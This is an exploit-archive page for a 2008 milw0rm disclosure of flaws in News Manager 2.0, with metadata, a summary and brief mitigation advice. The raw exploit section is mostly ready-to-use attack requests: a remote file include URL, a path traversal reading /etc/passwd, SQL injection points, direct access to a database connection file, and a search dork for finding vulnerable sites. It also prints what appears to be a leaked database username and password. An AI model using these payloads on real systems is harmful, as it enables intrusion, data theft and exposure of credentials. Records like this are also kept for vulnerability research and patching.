header-logo
Suggest Exploit
vendor:
News Manager 2.0
by:
Tryag-Team, HaCkeR_EgY, InjEctOr5 TeaM
8.8
CVSS
HIGH
Remote File Include, Remote File Disclosure, Remote SQL Injection, Remote Permission Bypass
94, 200, 89, 264
CWE
Product Name: News Manager 2.0
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:news_manager:news_manager:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

News Manager 2.0 Multiple Vulnerabilities

News Manager 2.0 is vulnerable to multiple vulnerabilities including Remote File Include, Remote File Disclosure, Remote SQL Injection, and Remote Permission Bypass. The Remote File Include vulnerability is present in the ch_readalso.php file, which allows an attacker to include a remote file. The Remote File Disclosure vulnerability is present in the attachments.php file, which allows an attacker to view the contents of a file on the server. The Remote SQL Injection vulnerabilities are present in the list_tagitems.php, advsearch.php, archive.php, and index.php files, which allow an attacker to inject malicious SQL queries. The Remote Permission Bypass vulnerability is present in the db/connect_str.php file, which allows an attacker to bypass authentication and gain access to the database. Additionally, an attacker can view the PHPINFO page by accessing the login/info.php file.

Mitigation:

To mitigate the Remote File Include vulnerability, ensure that user input is properly validated and filtered. To mitigate the Remote File Disclosure vulnerability, ensure that the web server is configured to deny access to sensitive files. To mitigate the Remote SQL Injection vulnerabilities, ensure that user input is properly validated and filtered. To mitigate the Remote Permission Bypass vulnerability, ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

News Manager 2.0 Multiple Vulnerabilities
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
1- Remote File Include Vulnerability
/ch_readalso.php?read_xml_include=http://localhost/020.txt
2- Remote File Disclosure Vulnerability
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
/login/attachments.php?id=
3- Remote SQL Injection Vulnerabilities
/list_tagitems.php?pid=-41[SQL]
/advsearch.php?lang='[SQL]
/archive.php?lang='[SQL]
/index.php?lang='[SQL]
4- Remote Permission Bypass Vulnerability
/db/connect_str.php
You Can Get Username Of db & Pass & Name .. As 
mysql||localhost||newsmanager||root||mahmood4li
5- You Can Get PHPINFO From 
/login/info.php
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs   :) 

# milw0rm.com [2008-05-15]